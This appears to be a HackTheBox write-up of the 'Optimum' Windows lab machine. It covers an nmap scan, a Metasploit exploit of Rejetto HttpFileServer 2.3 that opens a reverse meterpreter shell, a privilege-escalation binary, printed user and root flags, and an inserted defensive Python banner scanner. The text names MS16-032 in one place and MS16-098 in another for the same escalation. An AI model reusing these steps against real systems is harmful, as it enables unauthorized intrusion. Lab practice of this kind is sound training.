HTB Optimum - Windows (Easy)
Optimum is a beginner-level machine that mainly focuses on enumerating services with known exploits, here via Searchsploit and Msfconsole. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.
Network Enumeration
┌──(kali㉿kali)-[~]
└─$ cat scan.log
# Nmap 7.95 scan initiated 2025 as: /usr/lib/nmap/nmap -Pn -sV -oN scan.log 10.10.10.8
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.022s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at 2025 -- 1 IP address (1 host up) scanned in seconds
Welp, we know port 80/tcp is running a very old version, so we can look it up in searchsploit to see if we can maybe gain RCE from it, since there are no other endpoints that we could find.
Remote Code Execution
┌──(root㉿kali)-[/]
└─# searchsploit HttpFileServer
---------------------------------------------------
Exploit Title | Path
---------------------------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
---------------------------------------------------
Shellcodes: No Results
Boom! We get our guns; now we can just use that. It is exactly the same as the one we saw in our nmap scan.
Rejetto HttpFileServer 2.3.x
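The banner-to-advisory match made by hand above can be run routinely over scan logs of your own network. The following is an added example, not part of the original write-up: it parses nmap -sV -oN output and flags open ports whose version banner is on a watchlist. The WATCHLIST structure, the function names and the second host are assumptions constructed for illustration.

```python
import re

# Constructed input: the scan.log lines from this page plus one made-up host.
SCAN_LOG = """\
Nmap scan report for optimum.htb (10.10.10.8)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Nmap scan report for 192.0.2.20
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
443/tcp closed https
"""

# Hypothetical defender-maintained watchlist; the single entry mirrors the
# searchsploit title on this page ("Rejetto HttpFileServer 2.3.x").
WATCHLIST = [
    {"product": "HttpFileServer httpd", "version_prefix": "2.3",
     "reason": "Rejetto HttpFileServer 2.3.x - Remote Command Execution"},
]

HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?([\d.]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def version_matches(version, prefix):
    """True for 2.3, 2.3m, 2.3.1 against prefix 2.3; False for 2.30 or 2.4."""
    if not version.startswith(prefix):
        return False
    rest = version[len(prefix):]
    return rest == "" or not rest[0].isdigit()


def audit(scan_text, watchlist=WATCHLIST):
    """Return (host, port, banner, reason) for every open port on the watchlist."""
    findings, host = [], None
    for line in map(str.strip, scan_text.splitlines()):
        if m := HOST_RE.match(line):
            host = m.group(2)          # remember which host the port lines belong to
        elif (m := PORT_RE.match(line)) and host:
            port, proto, _service, banner = m.groups()
            for entry in watchlist:
                if not banner.startswith(entry["product"] + " "):
                    continue
                version = banner[len(entry["product"]):].split()[0]
                if version_matches(version, entry["version_prefix"]):
                    findings.append((host, f"{port}/{proto}", banner, entry["reason"]))
    return findings


if __name__ == "__main__":
    for finding in audit(SCAN_LOG):
        print(" | ".join(finding))
```

Closed and filtered ports are skipped, and only IPv4 report lines are recognised.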
Exploitation
┌──(root㉿kali)-[/]
└─# msfconsole -q
msf6 > search HttpFileServer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, sapni, http, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://10.10.x.x:8080/eh7zDBdXOthr
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /eh7zDBdXOthr
[*] Sending stage (177734 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\rxtXrNsrAA.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.10.10.8:49162) at 2025-07-14 16:29:14 +0000
[*] Server stopped.
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2025-07-21 01:04:06 +0000 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-07-21 00:46:17 +0000 user.txt
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
Welp, look at that: we got the user flag with just nmap, Searchsploit, and Metasploit. Once we get our Meterpreter shell, we can use the “shell” command to drop into a normal shell, or if you’re like me and don’t care about interfaces, just do what you would do on a Linux machine, maybe “ls”. We should have a shell as “optimum\kostas”.
Sysinfo & Target Vuln Recon
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
Wow, still I need to continue with this? bahahhaha
Windows Server 2012
Nice info. It seems everything can be done in 1 minute: at this point you can do privilege escalation by using a kernel attack on MS16-032, still via msfconsole.
msf6 exploit(windows/http/rejetto_hfs_exec) > search ms16-032
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
1 \_ target: Windows x86 . . . .
2 \_ target: Windows x64
Or you can set up your own manual exploit with PowerShell: manually upload and execute a PowerShell exploit script, e.g., Invoke-MS16-032. To be honest, winPEAS or any tool .exe would be just as easy as using a module from Metasploit itself, so we can just create a session 2.
Gain Administrator Access
meterpreter > cat user.txt
c0bd1d707e179cfd5553987f9bf06d99
meterpreter > upload winPEASx64.exe
[*] Uploading : /winPEASx64.exe
[*] Uploaded 8.00 MiB of 9.69 MiB (82.6%): /winPEASx64.exe -> winPEASx64.exe
[*] Uploaded 9.69 MiB of 9.69 MiB (100.0%): /winPEASx64.exe -> winPEASx64.exe
[*] Completed : /winPEASx64.exe -> winPEASx64.exe
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2025-07-21 01:36:30 +0000 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-0x-x1 00:46:17 +0000 user.txt
100777/rwxrwxrwx 10156032 fil 2025-0x-x1 01:38:21 +0000 winPEASx64.exe
meterpreter > .\winPEASx64.exe
[-] Unknown command: .winPEASx64.exe. Run the help command for more details.
meterpreter > shell
Process 2716 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
x1/0x/2025 04:38 <DIR> .
x1/0x/2025 04:38 <DIR> ..
x1/0x/2025 04:36 <DIR> %TEMP%
18/03/2017 03:11 760.320 hfs.exe
xx/0x/2025 03:46 34 user.txt
x1/0x/2025 04:38 10.156.032 winPEASx64.exe
3 File(s) 10.916.386 bytes
3 Dir(s) 5.677.174.784 bytes free
C:\Users\kostas\Desktop>.\winPEASx64.exe
.\winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Final foothold, and now we know what our next custom .exe file will be for moving forward to admin (you can find it on www.exploit-db.com).
meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 202x-07-x1 01:52:32 +0000 %TEMP%
100777/rwxrwxrwx 560128 fil 202x-07-x1 01:45:01 +0000 41020.exe
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-0x-x1 00:46:17 +0000 user.txt
100777/rwxrwxrwx 10156032 fil 2025-0x-x1 01:38:21 +0000 winPEASx64.exe
meterpreter > shell
Process 1628 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d2a1d3996608bb3280690d527db94fcd
C:\Users\Administrator\Desktop>type C:\Users\kostas\Desktop>user.txt
type C:\Users\kostas\Desktop>user.txt
Access is denied.
C:\Users\Administrator\Desktop>cd ../..
cd ../..
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users
18/03/2017 02:57 <DIR> .
18/03/2017 02:57 <DIR> ..
18/03/2017 02:52 <DIR> Administrator
xx/0x/2025 04:48 <DIR> kostas
22/08/2013 06:39 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 1.742.913.536 bytes free
C:\Users>cd kostas
cd kostas
C:\Users\kostas>cd Desktop
cd Desktop
C:\Users\kostas\Desktop>type user.txt
type user.txt
c0bd1d707e179cfd5553987f9bf06d99
C:\Users\kostas\Desktop>
A great box for starters: no Kerberos, no NTLM, no SQL or NoSQL, just a ready exploit to run and slam. Thanks, HackTheBox.
The Optimum machine reinforced the importance of thorough enumeration and research when approaching a penetration test. By systematically scanning for open services and identifying vulnerabilities, I was able to exploit the Rejetto HTTP File Server using Metasploit to gain an initial foothold.
From there, leveraging CVE helped uncover an unpatched Windows version vulnerable to MS16-098, which ultimately led to privilege escalation and full system control as NT AUTHORITY\SYSTEM. This box demonstrated how critical it is to recognize outdated software and leverage the right exploits efficiently to achieve a successful compromise.
Happy hacking!